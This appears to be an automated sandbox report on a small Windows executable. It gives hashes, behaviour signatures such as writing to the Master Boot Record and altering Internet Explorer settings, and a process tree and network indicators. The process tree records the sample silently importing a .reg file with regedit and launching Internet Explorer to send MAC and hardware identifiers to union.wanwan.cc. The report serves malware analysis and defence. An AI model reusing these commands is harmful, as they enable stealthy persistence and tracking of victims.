Analysis

  • max time kernel
    86s
  • max time network
    127s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20220901-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    19/09/2022, 06:13 UTC

General

  • Target

    d482c6d215425a56e2e15e213afef92f1db2116e12e4e45cefda3e7089dadd98.exe

  • Size

    16KB

  • MD5

    d51ebbfd2b0b1d0fa237212c183770c4

  • SHA1

    b063f620d68f26f8411045024f631c7a20bb9bc9

  • SHA256

    d482c6d215425a56e2e15e213afef92f1db2116e12e4e45cefda3e7089dadd98

  • SHA512

    6cd1ff448bcc1f7367b7ed156b368d68abba5a5d91b043bcb5151f61ca14327dcf83a4af614188de2adbf442f24ef8526f161f373cf78685c994e655a5d0a01b

  • SSDEEP

    384:3at4aSo1+esbKvlJCHJkXnY0bGgFIUXfUGzh6js7lNTn6MIy2:6So1Q4wk3Y0I+gsDn6MI9

Score
6/10

Malware Config

Signatures

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Modifies Internet Explorer settings 1 TTPs 11 IoCs
  • Modifies registry class 14 IoCs
  • Runs .reg file with regedit 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d482c6d215425a56e2e15e213afef92f1db2116e12e4e45cefda3e7089dadd98.exe
    "C:\Users\Admin\AppData\Local\Temp\d482c6d215425a56e2e15e213afef92f1db2116e12e4e45cefda3e7089dadd98.exe"
    1⤵
    • Writes to the Master Boot Record (MBR)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3932
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c regedit /s "C:\Users\Admin\AppData\Local\Temp\getback.reg"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4992
      • C:\Windows\SysWOW64\regedit.exe
        regedit /s "C:\Users\Admin\AppData\Local\Temp\getback.reg"
        3⤵
        • Modifies registry class
        • Runs .reg file with regedit
        PID:2716
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://union.wanwan.cc/Stat.ashx?Mac=0046CE8ECE48&Hard=QM00013&ClientType=Home&Process=86&UserID=0030&Authen=803-465
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:308
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:308 CREDAT:17410 /prefetch:2
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:3132

Network

  • DNS (US) from IEXPLORE.EXE to 8.8.8.8:53
    Request: union.wanwan.cc IN A
    Response: (none recorded)
  • DNS (US) from IEXPLORE.EXE to 8.8.8.8:53
    Request: union.wanwan.cc IN A
    Response: (none recorded)
  • 20.189.173.15:443
    322 B
    7
  • 2.18.109.224:443
    322 B
    7
  • 8.8.8.8:53
    union.wanwan.cc
    dns
    IEXPLORE.EXE
    61 B
    61 B
    1
    1

    DNS Request

    union.wanwan.cc

  • 8.8.8.8:53
    union.wanwan.cc
    dns
    IEXPLORE.EXE
    61 B
    61 B
    1
    1

    DNS Request

    union.wanwan.cc

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\Local\Temp\getback.reg

    Filesize

    1KB

    MD5

    626e2d76f5c328d57a3eff6a7f94d129

    SHA1

    210fd33fa005775b30a8fd40a065a2e788934216

    SHA256

    5d9ae4b62924d6da9c35305bfd0d61c893767b7113f8b2f239da02057f8bee6e

    SHA512

    629290bd5791a42327b3b70a68609c6b0b9114365be8579553e01e6cbc98996c0fab475b88c0dd80d34dcc325453401c6cce26fb70ed67a9cb08271a07fd85a1

  • memory/3932-132-0x0000000000400000-0x000000000040D000-memory.dmp

    Filesize

    52KB

  • memory/3932-138-0x0000000000400000-0x000000000040D000-memory.dmp

    Filesize

    52KB
